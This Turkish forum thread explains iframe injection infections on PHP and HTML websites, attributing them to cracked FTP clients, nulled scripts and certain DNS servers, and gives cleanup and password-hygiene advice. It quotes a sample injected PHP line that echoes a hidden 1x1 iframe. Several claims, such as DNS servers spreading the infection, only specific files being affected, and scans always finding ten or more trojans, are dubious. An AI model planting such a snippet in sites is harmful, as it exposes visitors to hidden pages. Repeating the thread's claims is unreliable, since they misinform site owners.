İframe Virüsü

[mucit41]

İframe Virüsü

Sitenizin php ve html sayfalarına bulaşan frame ve iframe virüsleri nedir?
Nasıl çalışır ve iframe virüsü nasıl temizlenir?

Bu aralar çok rastlıyorum bu duruma. Genelde CuteFTP programını Crackli kullanan arkadaşlarda bu durum meydana geliyor. Herzaman tavsiyem ücretsiz ve performanslı bir program olan FileZilla ’dır

İframe Virüsü Nedir?

Bir Tür Fake Sanal Hack Yöntemidir.Direkt Dosyalara ulaşmayan ancak Kanalları kullanarak sisteme kısmen erişen Çoğulcu virüstür.
Frame ve iFrame olarak tanımlanan bu virüs, FTP yolu ile sitenize bulaşan bir virüs türüdür. Amacı, sitenizin içinde genelde 1×1 pixel lik sayfa açarak, kendi websitesine hit ve rant kazandırmaktır.


Bazıları ise bu hit kazandırmanın yanısıra, bulaşmasını sağlamak için zararlı kod indirilmesini de sağlıyor.

Bir diğer Çeşitleri ise, iframe virüslerinin, sitenizin php ve html sayfalarına bulaşarak google ‘de sandbox a düşürmek / zararlı site olarak tanımlamak. Bu tarz durumlarda hem hit, hemde karizmanızı kaybedebiliyorsunuz.

Çünki, Virüs bulunan bir siteye kimse girmek istemez….


Bir iFrame virüsü nasıl anlaşılır?

Bir php sayfasına bulaşan iframe virüsünün örnek kodu alttaki gibidir;

echo "<iframe src=\"http://siteadresi\123" width=1 height=1
style=\"visibility:hidden;position:absolute\"></iframe>";Bu koda teknik açıdan biraz göz atalım.

Kodda php nin echo formatı içinde iframe komutu ile bir sayfa açtırmak istiyor. Bu sayfanın konumlandırılmasında yatayda 1, dikeyde ise 1 pixel derinlik verilmiş.

Kodun çağrıldığı adreste üstte belirttiğim zararlı bir işlem bulunuyor olabilir.


Nasıl Bulaşır?

Değerli Arkadaşlar 3 Türlü Yol Vardır

1- Null Scriptler
2- Null programlar
3- Bu en önemlisi ve en çok yapılanı dns değişkenleri

Özellikle Justin TV ve Youtube de Kullanılan DNS ler işin Başını çekiyor...

Örneğin size vereceğimiz aşağıdaki Dns bir iframe virüsü yayan Dns dir.
Aslında çok hızlı çalışır. Normalinden daha fazla hızlıdır. Ancak kullandıktan bir süre sonra farkedeceksiniz ki ftp programınıza kayıtlı bütün sitelerinize iframe bulaşmıştır.

iframe Virüsü Nasıl Temizlenir?

iFrame virüsleri genelde size FTP yolu ile bulaştı ise, tüm şifrelerinizi alır ve kayıt eder. Bu şifrelerinizi periyodik olarak bazı zamanlarda kontrol ederek FTP nize bağlanır. Eğer kodu sildiyseniz, zararlı yazılım ftp sifrenizi bildiginden tekrar girer ve virüs yazılırken tanımlanan php ve diğer sayfalara bulaşır. Bu demektir ki, kodu silmek yeterli değil.

Şimdi adımlar ile neler yapabileceğimize göz atalım…

•Bir FTP yazılımında Şifreniz Kayıtlı mı?
Eğer şifrenizi FTP programınızda kaydetme gibi bir alışkanlığınız varsa, bundan derhal vazgeçin! Tüm şifreleri FTP programınızdan temizleyin. Eğer Crackli bir FTP yazılımı kullanıyorsanız, (cuteFTP gibi) Kesinlikle bilgisayarınızdan kaldırın ve tavsiye ettiğimiz FileZilla yazılımını kurun.

•Bilgisayarınızdaki virüsü temizlemelisiniz!
Bu amaç için sizlere, kaspersky ürünlerini tavsiye ediyorum. Bu antivirüs yazılımı hakkındaki detaylı bilgiye ulaşmak için; http://www.hell-world.org/ownz/bilgisayar-ve-bilgi-guvenligini-korumak/ sayfasına göz atabilirsiniz.

•Bir spyware taraması da fena olmazdı!
Ad-aware se programını websitesinden indirin. Bilgisayarınızı bir Spyware taramasından geçirin!

•Virüsü temizledik Şimdi Sırada Sitemizden temizlemek!
Hemen yeni ve temiz bilgisayarımızda kurulu olan FTP programımız ile sitemize bağlanalım. Sitenizin tüm dosyalarını bilgisayarınıza indirin. İşte bu kısım en zahmetli kısım olacak. Çünki tek tek dosyalardaki kodları temizlemeniz gerekecek! (*)

Tüm dosyaları bilgisayarınıza indirdikten sonra, HTML editörünüz ile açarak, içinde tırnaklar olmadan: “script”, “frame”, “iframe” gibi kelimeleri tek tek aratın. Eğer buldugunuz kod size ait olan bir iframe kodu değilse, zararlı kodu hemen silin!

Eğer birçok dosyaya sahipseniz, bu işlemi birçok HTML editörünün de desteklediği, “tüm sayfalarda bul” seçeneyi ile tüm açık dökümanlarda aratabilirsiniz. Dreamweaver CTRL+H komutu ile bu pencereye ulasip, “find all open files” kısmını işaretlerseniz, tüm dosyalarınızda bunları tek arama ile bulabilir / değiştirebilirsiniz.

DNS kullanırken dikkat!!!

212.58.3.2
212.58.4.2

Hangi Dosyalara Bulaşır?

index.php (asp)
main.php (asp)
header.php (asp)
Footer.php (asp)
index.html (htp)
admin.php (asp)

Endişe Etmeyin Sadece bu dosyalara bulaşmaktadır.Diğer dosyalara bulaşmamaktadır.
Gezin bakın bunu farkedeceksiniz.

Çözüm:

Eğer İframe Web Sitelerinize Bulaşmış İse Öncelikle Derhal FTP ŞİFRENİZİ değişin. Göreceksiniz İFRAME VİRÜSÜ Sitelerinize Erişimi yitirecektir.

Bulaşan bütün dosyalardaki iframeleri silin.

Bilgisayarınızı Taratın ve en az 10 adet solucan veya trojan mutlaka çıkacaktır. Bu iframelerden bulaşmaktadır...


AHİLLA GLOBAL MEDYA

[saydax]

Benimde bir kaç tavsiyem olucaktır.

Şifreli asla ftp programına kayıtlı tutmayın bir txt dosyası vs.

Ardından şifreleri elinizle yazmayaın keyloger bunu algılar bunun yerine kopyala yapıştırı kullanabilirsiniz.

Ftpdeki dosyaların yazılabil,rliklerine yani CHMOD'lara dikkat edin.

Her bilgisayarda ftpye bağlanmayın.

[bestplayer]

13 senedir web tasarımıyla uğraşıyorum, sayısız şekilde null script indirmiş olabilirim, bunun yanında programda indirmiş olabilirim ama size yemin ederim 2 senedir web sitelerimin birçoğunda iframe virüsü var ve ben her yolu denedikçe lisanslı antivirüs satın alsam bile çıkıyorlar.

Araştırmalarım sonucu kullandığım bazı null program ya da scriptlerden olduğu kanısına vardım ve null olan herşeyden kaçmaya başladım.

Kendinizi benim yerime koyarsanız 80in üzerinde web siteniz var olduğunu düşünün ve bunlarda iframe virüsü çıkınca bunların en az 50 kişisi "web siteme virüs bulaşmış" ya da "google beni kara listeye almış" senin yaptığın siteden dolayı diyerekten sizi arayınca inanınki kafayı yiyorsunuz.

Bu null olaylarından bulaşıyormuş meğersem. Artık null kullanmamaya karar verdim. Aynı şeyin kendinize yapıldığını düşünün. Bir yerde bazı şeylerde lisanslanmalı diye düşünüyorum. (işletim sistemleri hariç)

Lütfen dikkat edin.